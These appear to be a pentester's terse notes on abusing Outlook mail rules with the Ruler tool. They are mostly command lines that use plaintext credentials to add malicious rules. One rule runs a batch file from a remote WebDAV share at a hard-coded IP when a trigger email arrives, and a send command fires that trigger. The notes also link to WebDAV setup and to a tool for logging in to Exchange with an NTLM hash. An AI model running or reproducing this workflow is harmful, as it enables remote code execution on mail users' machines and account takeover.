Notes on abusing Outlook mail client rules

Tool used:
https://github.com/sensepost/ruler

Notes on the tool's commands:

ruler-win64.exe -k --email [email protected] --username micle --password Admin12345 display

ruler-win64.exe -k --email [email protected] --username micle --password Admin12345 add --location "calc.exe" --trigger "systest" -name test
ruler-win64.exe -k --email [email protected] --username micle --password Admin12345 add --location "\\\\173.248.241.176\\webdav\\run.bat" --trigger "linux" -name linux

ruler-win64.exe -k --email [email protected] --username micle --password Admin12345  send --subject "hello linux" --body "ssssss"

ruler-win64.exe -k --email [email protected] --username micle --password Admin12345 delete --id 0100000005a104b6

ruler-win64.exe -k --email [email protected] --username test --password "123456aA!" display

Related articles:
https://paper.seebug.org/775/

Malicious Outlook Rules


WebDAV setup: https://www.digitalocean.com/community/tutorials/how-to-configure-webdav-access-with-apache-on-ubuntu-12-04

How to log in to Exchange and operate on it when only the NTLM hash is available:
https://github.com/pentest-tools-public/Pass-to-hash-EWS
